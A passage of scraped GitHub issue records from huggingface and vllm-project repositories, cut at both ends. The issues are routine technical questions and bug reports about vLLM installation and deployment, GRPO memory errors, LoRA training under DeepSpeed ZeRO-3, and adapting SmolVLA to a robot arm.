.1\njupyterlab_myst==2.4.2\njupyterlab_pygments==0.3.0\njupyterlab_server==2.27.3\njupyterlab_widgets==3.0.14\njupytext==1.17.3\nkeyring==25.6.0\nkiwisolver==1.4.8\nlaunchpadlib==1.11.0\nlazr.restfulclient==0.14.6\nlazr.uri==1.0.6\n-e git+https://github.com/huggingface/lerobot@6f5bb4d4a49fbdb47acfeaa2c190b5fa125f645a#egg=lerobot\nlibero @ git+https://github.com/huggingface/lerobot-libero.git@b053a4b0de70a3f2d736abe0f9a9ee64477365df\nllvmlite==0.45.1\nMako==1.3.10\nMarkdown==3.9\nmarkdown-it-py==3.0.0\nMarkupSafe==3.0.2\nmatplotlib==3.10.1\nmatplotlib-inline==0.1.7\nmdit-py-plugins==0.5.0\nmdurl==0.1.2\nmergedeep==1.3.4\nmistune==3.1.3\nmore-itertools==10.7.0\nmpmath==1.3.0\nmujoco==3.3.2\nmultidict==6.7.0\nmultiprocess==0.70.16\nmypy_extensions==1.1.0\nnbclient==0.10.2\nnbconvert==7.16.6\nnbformat==5.10.4\nnest-asyncio==1.6.0\nnetworkx==3.4.2\nnh3==0.2.21\nninja==1.11.1.4\nnotebook==7.4.1\nnotebook_shim==0.2.4\nnum2words==0.5.14\nnumba==0.62.1\nnumpy==2.2.5\noauthlib==3.2.2\nomegaconf==2.3.0\nonnx==1.17.0\nopencv-contrib-python==4.11.0.86\nopencv-python==4.11.0\nopencv-python-headless==4.12.0.88\noptimum==1.24.0\norderly-set==5.5.0\noverrides==7.7.0\npackaging==25.0\npandas==2.3.3\npandocfilters==1.5.1\nparso==0.8.4\npexpect==4.9.0\npfzy==0.3.4\npillow==11.2.1\npkginfo==1.12.1.2\nplatformdirs==4.3.7\npluggy==1.6.0\nprometheus_client==0.21.1\nprompt_toolkit==3.0.51\npropcache==0.4.1\nprotobuf==6.30.2\npsutil==7.0.0\nptyprocess==0.7.0\npure_eval==0.2.3\npyarrow==21.0.0\npyav==14.2.1\npycparser==2.22\npycuda==2025.1\npydantic==2.12.1\npydantic_core==2.41.3\nPygments==2.19.1\nPyGObject==3.48.2\nPyJWT==2.7.0\npynput==1.8.1\nPyOpenGL==3.1.10\nPyOpenGL-accelerate==3.1.10\npyparsing==3.1.1\npyrsistent==0.20.0\npyserial==3.5\npytest==8.4.2\npython-apt==2.7.7+ubuntu4\npython-dateutil==2.9.0.post0\npython-json-logger==3.3.0\npython-xlib==0.33\npytools==2025.1.2\npytz==2025.2\nPyYAML==6.0.2\npyyaml-include==1.4.1\npyzmq==26.4.0\nreadme_renderer==44.0\nreferencing==0.36.2\nregex==2024.11.6\nrequests==2.32.3\nrequests-toolbelt=", "url": "https://github.com/huggingface/lerobot/issues/2354", "state": "open", "labels": [ "question", "policies", "simulation" ], "created_at": "2025-11-01T11:20:05Z", "updated_at": "2026-01-05T08:38:48Z", "user": "Hesh0629" }, { "repo": "huggingface/trl", "number": 4419, "title": "GRPO with reward model. CUDA out of memory. How to fix? Thank you very much.", "body": "train_grpo.py:\n```python\nimport argparse\nimport os\nfrom typing import Callable, Dict, List, Optional\n\nimport torch\nfrom datasets import Dataset, load_dataset\nfrom transformers import (\n AutoModelForCausalLM,\n AutoTokenizer,\n AutoModelForSequenceClassification,\n pipeline,\n set_seed,\n)\nfrom trl import GRPOConfig, GRPOTrainer\n\n\nclass CombinedReward:\n \"\"\"Combine multiple reward sources with weights.\n\n Each reward function follows signature:\n reward_fn(completions: List[str], prompts: List[str], **kwargs) -> List[float]\n \"\"\"\n\n def __init__(\n self,\n reward_fns: List[Callable[[List[str], List[str]], List[float]]],\n weights: Optional[List[float]] = None,\n ) -> None:\n if not reward_fns:\n raise ValueError(\"reward_fns must not be empty\")\n self.reward_fns = reward_fns\n self.weights = weights or [1.0] * len(reward_fns)\n if len(self.weights) != len(self.reward_fns):\n raise ValueError(\"weights length must match reward_fns length\")\n\n def __call__(self, completions: List[str], prompts: List[str], **kwargs) -> List[float]:\n if not completions:\n return []\n all_scores: List[List[float]] = []\n for reward_fn in self.reward_fns:\n scores = reward_fn(completions, prompts, **kwargs)\n if len(scores) != len(completions):\n raise ValueError(\"All reward functions must return scores for each completion\")\n all_scores.append(scores)\n # weighted sum\n totals: List[float] = [0.0] * len(completions)\n for w, scores in zip(self.weights, all_scores):\n for i, s in enumerate(scores):\n totals[i] += w * float(s)\n return totals\n\n\ndef build_reward_model_fn(\n reward_model_name: str,\n device: Optional[str] = None,\n normalize: bool = True,\n) -> Callable[[List[str], List[str]], List[float]]:\n \"\"\"Create a reward function using a sequence classification model.\n\n Returns a function that outputs a scalar reward per completion.\n \"\"\"\n rm_tokenizer = AutoTokenizer.from_pretrained(reward_model_name, use_fast=True)\n \n # ensure padding token exists for batched inference\n if rm_tokenizer.pad_token is None:\n candidate = rm_tokenizer.eos_token or rm_tokenizer.sep_token or rm_tokenizer.cls_token or rm_tokenizer.unk_token\n if candidate is not None:\n rm_tokenizer.pad_token = candidate\n else:\n rm_tokenizer.add_special_tokens({\"pad_token\": \"[PAD]\"})\n rm_model = AutoModelForSequenceClassification.from_pretrained(reward_model_name, torch_dtype=torch.float16, \n device_map=\"auto\")\n if getattr(rm_model.config, \"pad_token_id\", None) is None and rm_tokenizer.pad_token_id is not None:\n rm_model.config.pad_token_id = rm_tokenizer.pad_token_id\n\n\n # use a pipeline for batching and device placement\n pipe_device = 0 if (device == \"cuda\" or (device is None and torch.cuda.is_available())) else -1\n rm_pipe = pipeline(\n task=\"text-classification\",\n model=rm_model,\n tokenizer=rm_tokenizer,\n # device=pipe_device,\n truncation=True,\n top_k=None,\n function_to_apply=\"none\", # use raw logits so we can map scores directly\n return_all_scores=True,\n )\n\n def reward_fn(completions: List[str], prompts: List[str], **kwargs) -> List[float]:\n del prompts # unused here\n outputs = rm_pipe(completions, batch_size=kwargs.get(\"batch_size\", 2))\n scores: List[float] = []\n for out in outputs:\n # If binary classifier, use logit of positive class; otherwise sum weighted by label index\n if len(out) == 1:\n scores.append(float(out[0][\"score\"]))\n else:\n # prefer last class as \"more positive\"\n scores.append(float(out[-1][\"score\"]))\n if not normalize:\n return scores\n # z-norm for stability (per-batch)\n t = torch.tensor(scores, dtype=torch.float32)\n std = float(t.std().clamp(min=1e-6))\n mean = float(t.mean())\n normed = ((t - mean) / std).tolist()\n return [float(x) for x in normed]\n\n return reward_fn\n\n\ndef build_keyword_reward_fn(keywords: List[str], case_sensitive: bool = False, bonus: float = 1.0) -> Callable[[List[str], List[str]], List[float]]:\n ks = keywords if case_sensitive else [k.lower() for k in keywords]\n\n def reward_fn(completions: List[str], prompts: List[str], **kwargs) -> List[float]:\n del prompts\n scores: List[float] = []\n for text in completions:\n t = text if case_sensitive else text.lower()\n count = sum(1 for k in ks if k in t)\n scores.append(bonus * float(count))\n return scores\n\n return reward_fn\n\n\ndef build_length_reward_fn(target_min: int, target_max: int, scale: float = 1.0) -> Callable[[List[str], List[str]], Li", "url": "https://github.com/huggingface/trl/issues/4419", "state": "open", "labels": [ "\ud83c\udfcb Reward", "\ud83c\udfcb GRPO" ], "created_at": "2025-11-01T10:29:28Z", "updated_at": "2025-11-20T12:26:50Z", "user": "guotong1988" }, { "repo": "vllm-project/vllm", "number": 27912, "title": "[Usage]: How should I use the CPU to deploy QWEN3 VL 30B-A3B?", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n(APIServer pid=1033476) Traceback (most recent call last):\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/bin/vllm\", line 33, in \n(APIServer pid=1033476) sys.exit(load_entry_point('vllm==0.11.1rc6.dev33+g3a5de7d2d.cpu', 'console_scripts', 'vllm')())\n(APIServer pid=1033476) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/site-packages/vllm-0.11.1rc6.dev33+g3a5de7d2d.cpu-py3.12-linux-x86_64.egg/vllm/entrypoints/cli/main.py\", line 73, in main\n(APIServer pid=1033476) args.dispatch_function(args)\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/site-packages/vllm-0.11.1rc6.dev33+g3a5de7d2d.cpu-py3.12-linux-x86_64.egg/vllm/entrypoints/cli/serve.py\", line 59, in cmd\n(APIServer pid=1033476) uvloop.run(run_server(args))\n(APIServer pid=1033476) File \"/home/maxgameone/.local/lib/python3.12/site-packages/uvloop/__init__.py\", line 109, in run\n(APIServer pid=1033476) return __asyncio.run(\n(APIServer pid=1033476) ^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/asyncio/runners.py\", line 194, in run\n(APIServer pid=1033476) return runner.run(main)\n(APIServer pid=1033476) ^^^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/asyncio/runners.py\", line 118, in run\n(APIServer pid=1033476) return self._loop.run_until_complete(task)\n(APIServer pid=1033476) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"uvloop/loop.pyx\", line 1518, in uvloop.loop.Loop.run_until_complete\n(APIServer pid=1033476) File \"/home/maxgameone/.local/lib/python3.12/site-packages/uvloop/__init__.py\", line 61, in wrapper\n(APIServer pid=1033476) return await main\n(APIServer pid=1033476) ^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/site-packages/vllm-0.11.1rc6.dev33+g3a5de7d2d.cpu-py3.12-linux-x86_64.egg/vllm/entrypoints/openai/api_server.py\", line 1910, in run_server\n(APIServer pid=1033476) await run_server_worker(listen_address, sock, args, **uvicorn_kwargs)\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/site-packages/vllm-0.11.1rc6.dev33+g3a5de7d2d.cpu-py3.12-linux-x86_64.egg/vllm/entrypoints/openai/api_server.py\", line 1926, in run_server_worker\n(APIServer pid=1033476) async with build_async_engine_client(\n(APIServer pid=1033476) ^^^^^^^^^^^^^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/contextlib.py\", line 210, in __aenter__\n(APIServer pid=1033476) return await anext(self.gen)\n(APIServer pid=1033476) ^^^^^^^^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/site-packages/vllm-0.11.1rc6.dev33+g3a5de7d2d.cpu-py3.12-linux-x86_64.egg/vllm/entrypoints/openai/api_server.py\", line 185, in build_async_engine_client\n(APIServer pid=1033476) async with build_async_engine_client_from_engine_args(\n(APIServer pid=1033476) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/contextlib.py\", line 210, in __aenter__\n(APIServer pid=1033476) return await anext(self.gen)\n(APIServer pid=1033476) ^^^^^^^^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/site-packages/vllm-0.11.1rc6.dev33+g3a5de7d2d.cpu-py3.12-linux-x86_64.egg/vllm/entrypoints/openai/api_server.py\", line 232, in build_async_engine_client_from_engine_args\n(APIServer pid=1033476) async_llm = AsyncLLM.from_vllm_config(\n(APIServer pid=1033476) ^^^^^^^^^^^^^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/site-packages/vllm-0.11.1rc6.dev33+g3a5de7d2d.cpu-py3.12-linux-x86_64.egg/vllm/utils/func_utils.py\", line 116, in inner\n(APIServer pid=1033476) return fn(*args, **kwargs)\n(APIServer pid=1033476) ^^^^^^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/site-packages/vllm-0.11.1rc6.dev33+g3a5de7d2d.cpu-py3.12-linux-x86_64.egg/vllm/v1/engine/async_llm.py\", line 218, in from_vllm_config\n(APIServer pid=1033476) return cls(\n(APIServer pid=1033476) ^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/site-packages/vllm-0.11.1rc6.dev33+g3a5de7d2d.cpu-py3.12-linux-x86_64.egg/vllm/v1/engine/async_llm.py\", line 140, in __init__\n(APIServer pid=1033476) self.engine_core = EngineCoreClient.make_async_mp_client(\n(APIServer pid=1033476) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/site-packages/vllm-0.11.1rc6.dev33+g3a5de7d2d.cpu-py3.12-linux-x86_64.egg/vllm", "url": "https://github.com/vllm-project/vllm/issues/27912", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-01T07:40:04Z", "updated_at": "2025-11-01T07:40:04Z", "comments": 0, "user": "maxgameone" }, { "repo": "vllm-project/vllm", "number": 27899, "title": "[Bug]: Inductor specialize after 2.9 rebase", "body": "### Your current environment\n\nNA\n\n### \ud83d\udc1b Describe the bug\n\nCould you or someone have a look at compile ranges [PR](https://github.com/vllm-project/vllm/pull/24252) again? It seems to stop working with the update to pytorch 2.9. We started getting failed assertions in generated code like it was compiled for a single shape. Could you explain how to let the inductor know that we compile for a range not for a single shape?\nExample of the assertion. Compilation was done for a range (512, 8192)\nassert_size_stride(arg0_1, (8192, s4, s94), (s4*s94, s94, 1))\n\nCan you add quick repro instructions?\n\nSure, on the PR branch:\nvllm serve meta-llama/Meta-Llama-3.1-70B-Instruct --disable-log-requests --no-enable-prefix-caching -tp 4 -dp 1 --max-num-seqs 256 --load-format dummy --port 8001 --compilation-config '{\"pass_config\":{\"enable_fusion\":false,\"enable_attn_fusion\":false,\"enable_noop\":true,\"enable_sequence_parallelism\":false,\"enable_async_tp\":false,\"enable_fi_allreduce_fusion\":true}}'\n\ncc @ilmarkov ", "url": "https://github.com/vllm-project/vllm/issues/27899", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-31T22:16:27Z", "updated_at": "2025-11-07T00:03:25Z", "comments": 7, "user": "laithsakka" }, { "repo": "vllm-project/vllm", "number": 27898, "title": "[Doc]: Multi-node EP on EFA (i.e. no IBGDA/DeepEP)", "body": "### \ud83d\udcda The doc issue\n\nUsecase: On AWS we have EFA for high bandwidth interconnect, not Infiniband, so no IBGDA.\n\nThe [documentation](https://docs.vllm.ai/en/latest/serving/expert_parallel_deployment.html#backend-selection-guide) indicates that the DeepEP kernels should be used for multi/inter-node EP, and pplx for single node. However, [DeepEP indicates that they only support IBGDA for inter-node comms](https://github.com/deepseek-ai/DeepEP/issues/369).\n\npplx has good support for EFA. Is pplx for single node, DeepEP for multi-node a suggestion based on testing, or a hard requirement?\n\nIn addition, it appears that the EP size cannot be configured and is always TP x DP. Is there any way to set EP size to equal TP size (for example), so we can have each node be a DP group and limit EP alltoall's to intra-node (NVLink) only?\n\nThank you!\n\nEDIT: per https://github.com/vllm-project/vllm/issues/27633 it appears this may be problematic, although since pplx supports EFA as a transportation layer, this seems bizarre. Specific docs around usage on EFA would be helpful.", "url": "https://github.com/vllm-project/vllm/issues/27898", "state": "open", "labels": [ "documentation" ], "created_at": "2025-10-31T21:22:28Z", "updated_at": "2025-11-06T19:50:07Z", "comments": 1, "user": "nathan-az" }, { "repo": "huggingface/peft", "number": 2884, "title": "[Question/Bug] How to safely continue LoRA fine-tuning under DeepSpeed ZeRO-3 (multi-stage training with modules_to_save)", "body": "Hi,\nI\u2019m trying to perform multi-stage LoRA fine-tuning under DeepSpeed ZeRO-3 using PEFT.\nHowever, continuing training on an existing LoRA checkpoint without merging causes a series of errors and conflicts.\n\n\nProblem\n\nWhen I load the LoRA from Stage 1 and attempt to continue training:\n\t\u2022\tload_state_dict() throws shape mismatch (e.g. [0, hidden_size])\n\t\u2022\tresize_token_embeddings() fails (empty tensor)\n\t\u2022\tGPU memory usage explodes (batch size drops from 4 \u2192 1)\n\nQuestion\n\nWhat\u2019s the recommended practice for continuing LoRA fine-tuning under ZeRO-3?\n\t\u2022\tShould we always merge the previous adapter (merge_and_unload()) before starting Stage 2?\n\t\u2022\tOr is there a way to safely keep the existing adapter and continue training?\n\n\n\n\n### Who can help?\n\n_No response_\n\n### Reproduction\n\nSetup\n\t\u2022\tStage 1: LoRA fine-tuning with modules_to_save=['wte','ff_out']\n\t\u2022\tStage 2: Continue training on a new dataset (without merging)\n\t\u2022\tUsing DeepSpeed ZeRO-3 (zero3_init_flag=False)\n\n\n### Expected behavior\n\nExpected Behavior\n\nPEFT should provide a consistent way to:\n\t\u2022\tContinue fine-tuning LoRA adapters across multiple stages with ZeRO-3 enabled.\n\t\u2022\tAvoid re-initialization or memory explosion when modules_to_save is used.", "url": "https://github.com/huggingface/peft/issues/2884", "state": "closed", "labels": [], "created_at": "2025-10-31T20:13:12Z", "updated_at": "2025-12-09T15:05:26Z", "user": "XiangZhang-zx" }, { "repo": "huggingface/lerobot", "number": 2351, "title": "Details of adapting SmolVLA to other robotic arms with different configurations", "body": "I want to deploy the untuned `smolvla_base` model directly onto my AgileX PIPER robotic arm.I ran into the following two issues along the way:\n1. Missing normalization parameters in the metadata.\n```\n File \"/home/zwt/miniconda3/envs/lerobot/lib/python3.10/site-packages/torch/utils/_contextlib.py\", line 116, in decorate_context\n return func(*args, **kwargs)\n File \"/home/zwt/Projects/lerobot/lerobot/common/policies/smolvla/modeling_smolvla.py\", line 434, in select_action\n batch = self._prepare_batch(batch)\n File \"/home/zwt/Projects/lerobot/lerobot/common/policies/smolvla/modeling_smolvla.py\", line 412, in _prepare_batch\n batch = self.normalize_inputs(batch)\n File \"/home/zwt/miniconda3/envs/lerobot/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1751, in _wrapped_call_impl\n return self._call_impl(*args, **kwargs)\n File \"/home/zwt/miniconda3/envs/lerobot/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1762, in _call_impl\n return forward_call(*args, **kwargs)\n File \"/home/zwt/miniconda3/envs/lerobot/lib/python3.10/site-packages/torch/utils/_contextlib.py\", line 116, in decorate_context\n return func(*args, **kwargs)\n File \"/home/zwt/Projects/lerobot/lerobot/common/policies/normalize.py\", line 170, in forward\n assert not torch.isinf(mean).any(), _no_stats_error_str(\"mean\")\nAssertionError: `mean` is infinity. You should either initialize with `stats` as an argument, or use a pretrained model.\n```\nThe error was resolved when I copied the normalization parameters from other training results, but I'm not sure if this is the correct way to run `smolvla_base` directly.\n2. I've noticed that different robotic arms may have different degrees of freedom, or even if they have the same degrees of freedom, the range of rotation of the same joint can vary. I'm unsure whether this range of rotation mapping is necessary when transferring the model to other robotic arms.It seems there is similar operation for the aloha in the code.\n```\n def _pi_aloha_decode_state(self, state):\n # Flip the joints.\n for motor_idx in [1, 2, 8, 9]:\n state[:, motor_idx] *= -1\n # Reverse the gripper transformation that is being applied by the Aloha runtime.\n for motor_idx in [6, 13]:\n state[:, motor_idx] = aloha_gripper_to_angular(state[:, motor_idx])\n return state\n\n def _pi_aloha_encode_actions(self, actions):\n # Flip the joints.\n for motor_idx in [1, 2, 8, 9]:\n actions[:, :, motor_idx] *= -1\n # Reverse the gripper transformation that is being applied by the Aloha runtime.\n for motor_idx in [6, 13]:\n actions[:, :, motor_idx] = aloha_gripper_from_angular(actions[:, :, motor_idx])\n return actions\n\n def _pi_aloha_encode_actions_inv(self, actions):\n # Flip the joints again.\n for motor_idx in [1, 2, 8, 9]:\n actions[:, :, motor_idx] *= -1\n # Reverse the gripper transformation that is being applied by the Aloha runtime.\n for motor_idx in [6, 13]:\n actions[:, :, motor_idx] = aloha_gripper_from_angular_inv(actions[:, :, motor_idx])\n return actions\n```\nbtw, is it a meaningful operation to directly run smolvla_base? This is just one of my sudden thoughts. ", "url": "https://github.com/huggingface/lerobot/issues/2351", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-10-31T14:55:35Z", "updated_at": "2025-12-14T14:47:04Z", "user": "yquanli" }, { "repo": "vllm-project/vllm", "number": 27880, "title": "[Installation]: [HELP]How to install the latest main version of vllm", "body": "### Your current environment\n\nI clone the vllm code, and run install commands, but it fails, Help!!\n\n### How you are installing vllm\n\n```sh\nVLLM_USE_PRECOMPILED=1 uv pip install --editable .\nUsing Python 3.10.12 environment at: /home/alice/.venv\n \u00d7 No solution found when resolving dependencies:\n \u2570\u2500\u25b6 Because there is no version of xformers{platform_machine == 'x86_64' and sys_platform == 'linux'}==0.0.33+5d4b92a5.d20251029 and vllm==0.11.1rc6.dev16+g933cdea44.precompiled depends\n on xformers{platform_machine == 'x86_64' and sys_platform == 'linux'}==0.0.33+5d4b92a5.d20251029, we can conclude that vllm==0.11.1rc6.dev16+g933cdea44.precompiled cannot be used.\n And because only vllm==0.11.1rc6.dev16+g933cdea44.precompiled is available and you require vllm, we can conclude that your requirements are unsatisfiable.\n(alice) alice@dc53-p31-t0-n067:~/vllm_bak$ uv pip install -e .\nUsing Python 3.10.12 environment at: /home/alice/.venv\n \u00d7 No solution found when resolving dependencies:\n \u2570\u2500\u25b6 Because there is no version of xformers{platform_machine == 'x86_64' and sys_platform == 'linux'}==0.0.33+5d4b92a5.d20251029 and vllm==0.11.1rc6.dev16+g933cdea44.cu126 depends on\n xformers{platform_machine == 'x86_64' and sys_platform == 'linux'}==0.0.33+5d4b92a5.d20251029, we can conclude that vllm==0.11.1rc6.dev16+g933cdea44.cu126 cannot be used.\n And because only vllm==0.11.1rc6.dev16+g933cdea44.cu126 is available and you require vllm, we can conclude that your requirements are unsatisfiable.```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27880", "state": "closed", "labels": [ "installation" ], "created_at": "2025-10-31T13:57:20Z", "updated_at": "2025-11-13T07:25:13Z", "comments": 7, "user": "sleepwalker2017" }, { "repo": "vllm-project/vllm", "number": 27877, "title": "[Usage]: How to install nightly version??? Why this command doesn't work?", "body": "### Your current environment\n\nI run this to install vllm with the latest code. But, the installed vllm doesn't include the code I need. \n\nI check the `siglip.py` file, it's modified 4 days ago. \n\nBut in the vllm installed, it doesn't contain this commit! https://github.com/vllm-project/vllm/pull/27566/files#diff-ca771e5a262cbf32fb481c518bea41d0e341414e021d6542e421abb98cceec61\n\n\nwhy is this?\n\nI use this command.\n```text\npip install -U vllm \\\n --pre \\\n --extra-index-url https://wheels.vllm.ai/nightly```\n\n`pip install -U vllm \\\n --pre \\\n --extra-index-url https://wheels.vllm.ai/nightly\nDefaulting to user installation because normal site-packages is not writeable\nLooking in indexes: https://bytedpypi.byted.org/simple, https://bytedpypi.byted.org/simple, https://wheels.vllm.ai/nightly\nRequirement already satisfied: vllm in /home/alice/.local/lib/python3.10/site-packages (0.11.0)\nCollecting vllm\n Downloading https://wheels.vllm.ai/nightly/vllm-0.11.1rc6.dev16%2Bg933cdea44.cu129-cp38-abi3-manylinux1_x86_64.whl (479.0 MB)\n \u2501\u257a\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 17.8/479.0 MB 575.3 kB/s eta 0:13:22`\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27877", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-31T12:29:51Z", "updated_at": "2025-10-31T12:38:19Z", "comments": 0, "user": "sleepwalker2017" }, { "repo": "vllm-project/vllm", "number": 27875, "title": "[Usage]: how to get profiler on OpenAI server", "body": "### Your current environment\n\n```text\nINFO 10-31 10:27:06 [importing.py:17] Triton not installed or not compatible; certain GPU-related functions will not be available.\nWARNING 10-31 10:27:06 [importing.py:29] Triton is not installed. Using dummy decorators. Install it via `pip install triton` to enable kernel compilation.\nINFO 10-31 10:27:08 [__init__.py:39] Available plugins for group vllm.platform_plugins:\nINFO 10-31 10:27:08 [__init__.py:41] - ascend -> vllm_ascend:register\nINFO 10-31 10:27:08 [__init__.py:44] All plugins in this group will be loaded. Set `VLLM_PLUGINS` to control which plugins to load.\nINFO 10-31 10:27:08 [__init__.py:235] Platform plugin ascend is activated\nWARNING 10-31 10:27:12 [_custom_ops.py:22] Failed to import from vllm._C with ModuleNotFoundError(\"No module named 'vllm._C'\")\nCollecting environment information...\nPyTorch version: 2.5.1\nIs debug build: False\n\nOS: Ubuntu 22.04.5 LTS (aarch64)\nGCC version: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version: Could not collect\nCMake version: version 4.1.0\nLibc version: glibc-2.35\n\nPython version: 3.11.13 (main, Jul 26 2025, 07:27:32) [GCC 11.4.0] (64-bit runtime)\nPython platform: Linux-5.10.0-60.18.0.50.r865_35.hce2.aarch64-aarch64-with-glibc2.35\n\nCPU:\nArchitecture: aarch64\nCPU op-mode(s): 64-bit\nByte Order: Little Endian\nCPU(s): 192\nOn-line CPU(s) list: 0-191\nVendor ID: HiSilicon\nBIOS Vendor ID: HiSilicon\nModel name: Kunpeng-920\nBIOS Model name: HUAWEI Kunpeng 920 5250\nModel: 0\nThread(s) per core: 1\nCore(s) per socket: 48\nSocket(s): 4\nStepping: 0x1\nBogoMIPS: 200.00\nFlags: fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp cpuid asimdrdm jscvt fcma dcpop asimddp asimdfhm ssbs\nL1d cache: 12 MiB (192 instances)\nL1i cache: 12 MiB (192 instances)\nL2 cache: 96 MiB (192 instances)\nL3 cache: 192 MiB (8 instances)\nNUMA node(s): 8\nNUMA node0 CPU(s): 0-23\nNUMA node1 CPU(s): 24-47\nNUMA node2 CPU(s): 48-71\nNUMA node3 CPU(s): 72-95\nNUMA node4 CPU(s): 96-119\nNUMA node5 CPU(s): 120-143\nNUMA node6 CPU(s): 144-167\nNUMA node7 CPU(s): 168-191\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; __user pointer sanitization\nVulnerability Spectre v2: Not affected\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\nVersions of relevant libraries:\n[pip3] numpy==1.26.4\n[pip3] pyzmq==27.0.2\n[pip3] torch==2.5.1\n[pip3] torch-npu==2.5.1.post1\n[pip3] torchvision==0.20.1\n[pip3] transformers==4.52.4\n[conda] Could not collect\nvLLM Version: 0.9.1\nvLLM Ascend Version: 0.9.2.dev0+g0740d1021.d20251029 (git sha: 0740d1021, date: 20251029)\n\nENV Variables:\nATB_OPSRUNNER_KERNEL_CACHE_LOCAL_COUNT=1\nATB_STREAM_SYNC_EVERY_RUNNER_ENABLE=0\nATB_OPSRUNNER_SETUP_CACHE_ENABLE=1\nATB_WORKSPACE_MEM_ALLOC_GLOBAL=0\nATB_DEVICE_TILING_BUFFER_BLOCK_NUM=32\nATB_STREAM_SYNC_EVERY_KERNEL_ENABLE=0\nVLLM_TORCH_PROFILER_DIR=/workspace/prof\nATB_OPSRUNNER_KERNEL_CACHE_GLOABL_COUNT=5\nATB_HOME_PATH=/usr/local/Ascend/nnal/atb/latest/atb/cxx_abi_0\nASCEND_TOOLKIT_HOME=/usr/local/Ascend/ascend-toolkit/latest\nATB_COMPARE_TILING_EVERY_KERNEL=0\nASCEND_OPP_PATH=/usr/local/Ascend/ascend-toolkit/latest/opp\nLD_LIBRARY_PATH=/usr/local/Ascend/nnal/atb/latest/atb/cxx_abi_0/lib:/usr/local/Ascend/nnal/atb/latest/atb/cxx_abi_0/examples:/usr/local/Ascend/nnal/atb/latest/atb/cxx_abi_0/tests/atbopstest:/usr/local/Ascend/ascend-toolkit/latest/tools/aml/lib64:/usr/local/Ascend/ascend-toolkit/latest/tools/aml/lib64/plugin:/usr/local/Ascend/ascend-toolkit/latest/lib64:/usr/local/Ascend/ascend-toolkit/latest/lib64/plugin/opskernel:/usr/local/Ascend/ascend-toolkit/latest/lib64/plugin/nnengine:/usr/local/Ascend/ascend-toolkit/latest/opp/built-in/op_impl/ai_core/tbe/op_tiling/lib/linux/aarch64:/usr/local/Ascend/nnal/atb/latest/atb/cxx_abi_0/lib:/usr/local/Ascend/nnal/atb/latest/atb/cxx_abi_0/examples:/usr/local/Ascend/nnal/atb/latest/atb/cxx_abi_0/tests/atbopstest:/usr/local/Ascend/ascend-toolkit/latest/tools/aml/lib64:/usr/local/Ascend/ascend-toolkit/latest/tools/aml/lib64/plugin:/usr/local/Ascend/ascend-toolkit/latest/lib64:/usr/local/Ascend/ascend-toolkit/latest/lib64/plugin/opskernel:/usr", "url": "https://github.com/vllm-project/vllm/issues/27875", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-31T10:33:49Z", "updated_at": "2025-10-31T14:38:04Z", "comments": 1, "user": "zhaohaixu" }, { "repo": "vllm-project/vllm", "number": 27872, "title": "[Feature]: AFD support load customer connect model from local path.", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nAdd `afd_connector_module_path` field in AFDConfig, user can implement customer afd connect, but don't need change vllm 